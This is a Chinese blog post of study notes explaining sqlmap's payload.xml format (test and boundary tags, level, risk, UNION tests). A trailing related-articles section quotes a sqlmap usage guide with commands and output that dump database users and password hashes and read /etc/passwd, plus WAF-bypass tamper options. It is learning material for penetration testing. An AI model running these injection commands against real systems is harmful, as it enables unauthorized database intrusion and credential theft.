sqlmap学习笔记(二)

最新推荐文章于 2022-12-02 09:04:18 发布
最新推荐文章于 2022-12-02 09:04:18 发布
阅读量163 收藏
点赞数
分类专栏: python hacker 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84014754
版权

     上篇讲到了payload.xml,这篇就详细说下

payload.xml帮助 写道
<!--
Tag: <boundary>
How to prepend and append to the test ' <payload><comment> ' string.

Sub-tag: <level>
From which level check for this test.

Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

A comma separated list of these values is also possible.

Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: When the value of <test>'s <where> is 1.
2: When the value of <test>'s <where> is 2.
3: When the value of <test>'s <where> is 3.

A comma separated list of these values is also possible.

Sub-tag: <ptype>
What is the parameter value type.

Valid values:
1: Unescaped numeric
2: Single quoted string
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string

Sub-tag: <prefix>
A string to prepend to the payload.

Sub-tag: <suffix>
A string to append to the payload.


Tag: <test>
SQL injection test definition.

Sub-tag: <title>
Title of the test.

Sub-tag: <stype>
SQL injection family type.

Valid values:
0: Heuristic check to parse response errors
1: Boolean-based blind SQL injection
2: Error-based SQL injection
3: UNION query SQL injection
4: Stacked queries SQL injection
5: AND/OR time-based blind SQL injection

Sub-tag: <level>
From which level check for this test.

Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

Sub-tag: <risk>
Likelihood of a payload to damage the data integrity.

Valid values:
0: No risk
1: Low risk
2: Medium risk
3: High risk

Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

A comma separated list of these values is also possible.

Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string

Sub-tag: <vector>
The payload that will be used to exploit the injection point.

Sub-tag: <request>
What to inject for this test.

Sub-tag: <payload>
The payload to test for.

Sub-tag: <comment>
Comment to append to the payload, before the suffix.

Sub-tag: <char>
Character to use to bruteforce number of columns in UNION
query SQL injection tests.

Sub-tag: <columns>
Range of columns to test for in UNION query SQL injection
tests.

Sub-tag: <response>
How to identify if the injected payload succeeded.

Sub-tag: <comparison>
Perform a request with this string as the payload and compare
the response with the <payload> response. Apply the comparison
algorithm.

NOTE: useful to test for boolean-based blind SQL injections.

Sub-tag: <grep>
Regular expression to grep for in the response body.

NOTE: useful to test for error-based SQL injection.

Sub-tag: <time>
Time in seconds to wait before the response is returned.

NOTE: useful to test for time-based blind and stacked queries
SQL injections.

Sub-tag: <union>
Calls unionTest() function.

NOTE: useful to test for UNION query (inband) SQL injection.

Sub-tag: <oob>
# TODO

Sub-tag: <details>
Which details can be infered if the payload succeed.

Sub-tags: <dbms>
What is the database management system (e.g. MySQL).

Sub-tags: <dbms_version>
What is the database management system version (e.g. 5.0.51).

Sub-tags: <os>
What is the database management system underlying operating
system.

Formats:
<boundary>
<level></level>
<clause></clause>
<where></where>
<ptype></ptype>
<prefix></prefix>
<suffix></suffix>
</boundary>

<test>
<title></title>
<stype></stype>
<level></level>
<risk></risk>
<clause></clause>
<where></where>
<vector></vector>
<request>
<payload></payload>
<comment></comment>
<char></char>
<columns></columns>
</request>
<response>
<comparison></comparison>
<grep></grep>
<time></time>
<union></union>
<oob></oob>
</response>
<details>
<dbms></dbms>
<dbms_version></dbms_version>
<os></os>
</details>
</test>
-->

 

 

 

这是一个test实例 写道
    <test>
        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
        <stype>3</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>NULL</char>
            <columns>1-10</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>

   

       首先看注释中payloads文件中共分为两类元素,一类为<boundary>,一类为<test>,

其中boundary指的是注入时使用的一些通配符之类的,类似'  )  (  and  1=1  and '1'='1之类的东西,

而test则是注入时具体使用的语句,类似select之类的。两者区别还是比较明显的

 先讲讲两个元素中相同的子元素释义:

 

 

1. level这个属性,这是每个test都要有的属性,他指出了在sql注入中处于哪个档次,换句话说,你在实际运行sqlmap的时候,需要指定运行level,默认是1,从1-5都可以指定,在level=1的情况下,大概执行的注入test在100个以内,level越高,所执行的test越多,如果你指定level5,那么所有test中标注为1,2,3,4,5的都将执行,这里要注意的是执行level 5,估计执行的sql注入语句将超过1000个,如果再猜解表内容,语句将更多,并不是注入test越多越好,这将造成大量的通信负担。另外,如上所举的例子 UNION query (NULL) ,就是level 1 ,最基本的测试,实际上union null测试字段个数也是最常见的手法,但是这里如果你实际使用就会发现,这里有些问题,后面类似的会有11-20字段,21-30字段这样的test,并且他们给予了不同的level,估计老外觉得查询字段一般不会超过10个,但是我觉得这个不是很合理,所以我推荐大家把后面那几个的level都改成1,这样子实际使用效果将会非常好。

 

 

2.clause这个属性,这是一个条件属性,test编辑中是可以多选的

写道
Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

 

大家可以看<title>MySQL UNION query (NULL) - 1 to 10 columns</title>所举得例子中,     <clause>1,2,3,4,5</clause>,即union可以在 where/having子句中,group by ,order by limit offset子句中使用,后面比较多的test中,也可以看到基本上也就前面的几个常用些,特别是1-5,当然你要吃不准你自创的sql的话,就标注成1吧。。。

 

3.where 这个属性,

写道
Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: When the value of <test>'s <where> is 1.
2: When the value of <test>'s <where> is 2.
3: When the value of <test>'s <where> is 3.

A comma separated list of these values is also possible.

 这是他的boudary中的注释,我估计写错了,test中的注释是

 

写道
Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string

 

这个估计是对的,实际上就是1 附加到原始的变量值后面,类似id=1 ’这个概念,而2就是 id=31231 ‘这个概念。3就是id=’这个概念,细微之处大家可以体会下。具体sql具体对待。

 

 

下来就是各自独有的概念了,

4 <boudary>中的ptype属性

写道
1: Unescaped numeric
2: Single quoted string
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string

 实际上就是bandary的值是什么属性,数字,单引号字符串,或者双引号字符串。

 

5 <boudary>中的ptype属性<prefix> <suffix>这一对,就是前缀和后缀了,举个例子因为在实际中payload可能有重复迭代,例如那个union null,所以把select之类可以设成前缀,

 

6. <test>中的独有概念

<title>显示用的,没啥大用,但也别起个没意义的,例如Microsoft SQL Server/Sybase error-based - Parameter replace,就比较好,指出数据库名,注入类型,具体功能。

 

<stype> 比较重要的一个属性

写道
Valid values:
0: Heuristic check to parse response errors
1: Boolean-based blind SQL injection
2: Error-based SQL injection
3: UNION query SQL injection
4: Stacked queries SQL injection
5: AND/OR time-based blind SQL injection

 

这是一个分类,就是你写的这个test具体属于那个功能模块的是盲注呢,还是union注入呢,还是基于时间的呢,这个也很直白。

 

<risk>这个属性也很重要,

写道
Valid values:
0: No risk
1: Low risk
2: Medium risk
3: High risk

 

实质就是,如果你的sql注入语句包含了update,insert,delete之类的或者更猛的操作,那么请不要设置为0,而且自己在用sqlmap的时候也不要轻易的设置--risk为高值,因为risk较高的操作都带有ddl的性质,容易引起数据库数据上的改变。谨慎,慎重。

 

<vector> 就是要执行的sql注入句式 例如在上面那个例子中就是<vector>[UNION]</vector>,实际上是union all select句型,这个细节我也需要继续学习。。

 

<response>和<request>这个是sql注入中最关键的一个部分,他们被设计的赋予了很大的灵活性和技巧,下次再说吧。。。。。

 

 

 


 

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP使用总结
qq_44657899的博客
05-02 1121
正常注入 python sqlmap.py -r .\test.txt --level 3 --batch --dbs 绕过waf sqlmap.py -r .\test.txt --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py 获取可获得信息 sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的博客
11-25 2245
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入、字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的数字型关卡无过滤任何信息。
iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过
最新发布
mooyuan的博客
12-02 876
总结 SQL注入主要分析几个内容 (1)闭合方式是什么?iwebsec的第12关关卡为数字型,无闭合 (2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功 (3)是否过滤了关键字?很明显通过源码,iwebsec的第12关卡过滤了等号关键字 了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的等号过滤绕过的SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入
mooyuan的博客
11-27 960
打开靶场的SQL注入关卡的第06关宽字节注入关卡id=1​通过源码再来分析下时间盲注关卡重点内容:(1)闭合方式是什么?iwebsec的第06关关卡为字符型注入,闭合方式为单引号(2)注入类别是什么?这部分是宽字节盲注(3)是否过滤了关键字?很明显通过源码,iwebsec的宽字节型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透。
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
ibatis学习笔记.txt
03-11
### iBatis 学习笔记知识点总结 #### 一、iBatis 概念与特点 **1.1 iBatis 定义** - **iBatis** 是一个基于 Java 的开源持久层框架,它专注于 SQL 映射,提供了一种将对象与数据库交互过程中的 SQL 语句进行分离的...
IBATIS学习笔记
03-29
### IBATIS学习笔记知识点详解 #### 一、IBATIS简介 iBatis是一个用于Java的数据持久化框架,类似于Hibernate、JDO和EJB等技术。它的主要特点是将对象映射为SQL语句,这使得开发人员可以更加灵活地控制SQL的执行,...
ibatis 学习笔记
12-03
<sqlMap resource="User.xml"/> ``` `User.xml`是具体的SQL Map文件,其中定义了与用户相关的SQL语句映射。 总的来说,iBATIS以其简单易用和灵活性著称,允许开发者编写自定义SQL,同时提供数据访问的抽象层,使得...
sqlmap使用文档
11-11
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。文档基本涵盖所有指令,内容十分详细。
sqlmap (懂的入)
08-09
Here is a list of major features implemented in sqlmap: * Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase; * Extensive database management system back-end fingerprint based upon: o Inband DBMS error messages o DBMS banner parsing o DBMS functions output comparison o DBMS specific features such as MySQL comment injection o Passive SQL injection fuzzing * It fully supports two SQL injection techniques: o Blind SQL injection, also known as Inference SQL injection o Inband SQL injection, also known as UNION query SQL injection and it partially supports error based SQL injection as one of the vectors for database management system fingerprint; * It automatically tests all provided GET, POST, Cookie and User- Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three type with one and two brackets to find which is the valid syntax to perform further injections with; * It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters; * SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end; * It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching; * HTTP requests can be performed in both HTTP method GET and POST (default: GET); * It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file; * It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data; * It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL; * It is possible to provide the remote DBMS back-end if you already know it making sqlmap save some time to fingerprint it; * It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated; * It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability; * It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data; * It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack; * Support to increase the verbosity level of output messages; * It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time; * PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function. 昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。 1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap 详细用法 1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id" 5、指定方法和post的数据 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE" 7、通过代理注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 11、获取banner信息 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- current-db current database: 'testdb' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- passwords database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs available databases [3]: [*] information_schema [*] mysql [*] testdb python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema" Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- columns -T "user" -D "mysql" Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+ 13、显示指定的文件内容,一般用于php python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / etc/passwd /etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash --- 14、执行你自己的sql语句。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 15、union注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- union-use --banner [...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - o "sqlmap.log" [...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- banner -o "sqlmap.log" --resume [...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
sqlmap忽略500报错,继续注入
weixin_44400900的博客
08-24 2330
sqlmap忽略500报错,继续注入
SqlMap用户手册
ludx212的专栏
06-10 1285
SqlMap用户手册 转自 投稿者:梧桐雨 发表于:2013-07-28   点击:13,549 引:本文已经出了续篇,文章内容有点长,但都是精华,读者们耐心的看吧,续篇的链接在文末。 1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,
《Metasploit渗透测试魔鬼训练营》学习笔记
热门推荐
weixin_40133285的博客
05-16 4万+
Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记 |Linux Metasploitable | Linux靶机 | 下载vmware虚拟机镜像 |WinXP Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |OWASP BWA | Web服务器靶机| 下载vmware虚拟机镜像 |Win2K3 Metasploitable |Windows靶机 | 下载vmware虚拟机镜像
Python全栈(五)Web安全攻防之6.SQL注入和绕过
CUFEECR的博客
03-05 4234
盲注是注入攻击的一种,向数据库发生true或false这样的问题,并根据应用程序返回的信息判断结果,分为布尔盲注和时间盲注,GET基于时间的盲注包括判断注入点、判断数据库长度和数据库名字,GET基于Boolean的盲注包括判断数据库长度和数据库名字,可以用sqlmap进行安全测试;POST 注入包括错误注入(单引号注入、双引号注入)、基于时间的注入和基于布尔的注入,也可以可以用sqlmap进行安全测试;SQL注入绕过手段包括大小写绕过、双写绕过、编码绕过和内联注释绕过。
from injection shell sql to_CTF靶场系列-Pentester Lab: From SQL injection to Shell...
weixin_39615219的博客
01-17 351
下载地址https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_pg_edition_i386.iso实战演练使用netdiscover命令查找靶机的IP。使用nmap查看靶机开放的端口打开浏览器直接用sqlmap就可以测试,下面是记录SQLMAP跑Postgresql的过程root@kali:~# sqlmap -u "http:...
Sqlmap 使用方法小结
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
python 反编译 pyc 一些心得
ice
09-06 2881
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
iBATIS学习笔记:从基础到高级操作
"这是一份基于iBATIS 2.3.4的学习笔记,涵盖了iBATIS的基本概念、环境搭建、配置文件、CRUD操作、批处理、优点与缺点,以及高级特性如动态SQL和事务管理等内容。" iBATIS是一个优秀的Java持久层框架,它允许开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值